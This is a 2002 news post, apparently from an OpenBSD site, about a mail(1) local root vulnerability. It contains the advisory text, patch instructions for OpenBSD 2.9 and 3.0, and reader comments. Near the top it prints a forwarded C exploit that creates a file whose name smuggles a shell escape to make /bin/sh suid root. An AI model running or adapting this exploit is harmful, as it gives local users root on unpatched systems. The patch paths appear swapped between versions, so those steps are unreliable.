"The mail(1) program can be made to execute arbitrary code in non interactive mode. this can be exploited using cron and the system startup scripts (by any local user with no privs) a patch is and advisory is available on the
advisory
page.
the fix has also been applied to the stable branches."
There is an exploit for this in the wild, from ViPER:
Subject: 2.9 3.0 local root exploit worth posting ;)
Date: Fri, 12 Apr 2002 16:05:55 +0200 (CEST)
From: ViPER / DMRT
To: webmaster@deadly.org
CC: ghost@dmrt.net
http://www.securitydatabase.net/forum/viewtopic.php?TopicID=3935#8314
http://www.bsdaemon.be/article.php?sid=302&mode=thread&order=0
/*
* (c) 2002 venglin@freebsd.lublin.pl
*
* OpenBSD 3.0 (before 08 Apr 2002)
* /etc/security + /usr/bin/mail local root exploit
*
* Run the exploit and wait for /etc/daily executed from crontab.
* /bin/sh will be suid root next day morning.
*
* Credit goes to urbanek@openbsd.cz for discovering vulnerability.
*
*/
#include
int main(void)
{
int fd;
chdir("/tmp");
fd = open(" ~!chmod +s `perl -e 'print "5714215115657163150"'` ",
O_CREAT|O_WRONLY, 04777);
if (fd)
close(fd);
}
OpenBSD v3.0
cd /usr/src
ncftpget
ftp://ftp.openbsd.org/pub/OpenBSD/patches/2.9/common/023_mail.patch
patch -p0
<023_mail.patch
cd usr.bin/mail
make cleandir
make obj
make depend
make && make install
OpenBSD v2.9
cd /usr/src
ncftpget
ftp://ftp.openbsd.org/pub/OpenBSD/patches/3.0/common/018_mail.patch
patch -p0 < 018_mail.patch
cd usr.bin/mail
make cleandir
make obj
make depend
make && make install
023_mail.patch
cd>
(Comments are closed)
Comments
By
Anonymous Coward ()
on
Isn’t this like the third local root exploit within 6 months. I am glad that we are getting told about each of these exploits, don’t get me wrong, but what has happened in the last couple of months to make OBSD so “vulnerable”?? Has there been less testing between releases?? OBSD’s three local root exploits in 6 months is WAY better than Redhat’s crack-of-the-week, I am just wondering if I/We are slacking on bug finding/reporting.
By Anonymous Coward () on
By Chris () on http://www.dejection.org.uk/
Just comparing OpenBSD to anything else, at least we know about this and have a fix for it, as I'm sure we wouldnt if it was an MS OS.
Follow NTbugtraq and you'll see what I mean.
I have to use both systems and I can tell you I'm a million times happier using OpenBSD on my systems!
By Anonymous Coward () on
At least it's not a remote hole.
By bengt kleberg () eleberg@cbe.ericsson.se on mailto:eleberg@cbe.ericsson.se
bengt